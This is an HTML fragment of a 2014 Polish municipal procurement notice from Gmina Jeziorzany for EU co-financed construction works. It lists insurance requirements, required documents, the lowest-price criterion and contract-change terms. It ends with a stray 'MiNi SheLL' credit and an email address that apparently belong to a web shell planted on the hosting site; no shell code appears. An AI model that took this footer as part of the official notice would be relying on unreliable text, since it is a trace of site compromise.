<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony w przypadku, gdy Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia co najmniej na kwotę 500 000,0 zł

Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę ubezpieczeniowa , a w przypadku jej braku inny dokument potwierdzający, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	dowód wniesienia wadium,
b)	Informacja o części zamówienia , której wykonanie Wykonawca zamierza powierzyć do wykonania podwykonawcy ( wg. załącznika nr 7) 
c)	kosztorys ofertowy sporządzony na podstawie opisu przedmiotu zamówienia, dokumentacji projektowej, przedmiaru robót</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wykonawca, którego oferta zostanie wybrana zobowiązany będzie do podpisania umowy na warunkach określonych we wzorze umowy stanowiącym załącznik nr 8 do niniejszej SIWZ. 
2.	Zamawiający przewiduje następujące okoliczności i warunki zamiany postanowień zawartej umowy:
a)	zmiany strony umowy tj. następstwo prawne wynikające z odrębnych przepisów,
b)	zmiana nazwy, adresu i siedziby Wykonawcy lub Zamawiającego,
c)	zmiany osób lub podmiotów reprezentujących oraz odpowiedzialnych za wykonywanie zadania ze strony Wykonawcy lub Zamawiającego - jeżeli zmiana taka nie wpłynie na pozostałe warunki realizacji umowy,
d)	wprowadzenie/ zmiana podwykonawcy
e)	w razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy Zamawiający zastrzega sobie możliwość odstąpienia od umowy - w takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego z tytułu wykonania części umowy,
f)	 Zamawiający dopuszcza także możliwość zmian postanowień umowy w następujących przypadkach:
gdy wprowadzenie zmian jest korzystne dla Zamawiającego,
wystąpienie nieistotnych zmian, które nie mają wpływu na istotne postanowienia umowy

Zmiana sposobu świadczenia Wykonawcy będzie wymagała zawarcia aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> htpp//bip.jeziorzany.eu; www.jeziorzany.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Jeziorzany, Ul. Rynek 22, 21-146 Jeziorzany, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2014 godzina 10:00, miejsce: Gmina Jeziorzany, ul. Rynek 22, 21-146 Jeziorzany, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest współfinansowane ze środków Unii Europejskiej w ramach Programu Rozwoju
Obszarów Wiejskich na lata 2007 - 2013 Podstawowe usługi dla gospodarki i ludności wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com